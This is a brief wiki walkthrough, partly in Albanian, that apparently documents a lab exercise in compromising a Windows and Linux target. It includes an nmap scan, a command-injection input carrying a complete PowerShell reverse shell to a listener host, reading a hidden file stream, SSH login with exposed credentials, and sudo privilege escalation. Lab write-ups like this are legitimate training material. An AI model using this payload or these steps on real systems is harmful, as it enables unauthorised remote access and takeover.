cyberdocs:example_gain-access_using_powershell-script
power shell
cat oneliner.tcp
ip: 172.16.60.54
nmap -sV 172.16.60.54
80 - eshte gjet hap
ne local machine
nc -lnvp 5588
permes web app ne target IP e run kete shell cmd
google.com|powershell -command "$client = New-Object System.Net.Sockets.TCPClient('172.16.60.108',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
kjo na jep qasje ne shell te target
kalo ne desktop te userit
C:\users\arben\Desktop>
Get-item -Path C:\Users\arben\Desktop\root.txt -stream *
Get-Content -Path C:\Users\arben\Desktop\root.txt -stream target.txt
cyber@172.16.60.65
pass: 123Arben123
me te dhenat e gjetura hym me ssh
ssh cyber@172.16.60.65
pass: 123Arben123
$
$ sudo -l
eshte gjet
/bin/dash /home/cyber/root_me
$ cat /home/cyber/root_me
shihet permbajtja e scriptes
#!/bin/dash
sudo /bin/dash /home/cyber/root_me
# :) root
cyberdocs/example_gain-access_using_powershell-script.txt · Last modified: 2019/02/06 14:55 by dardan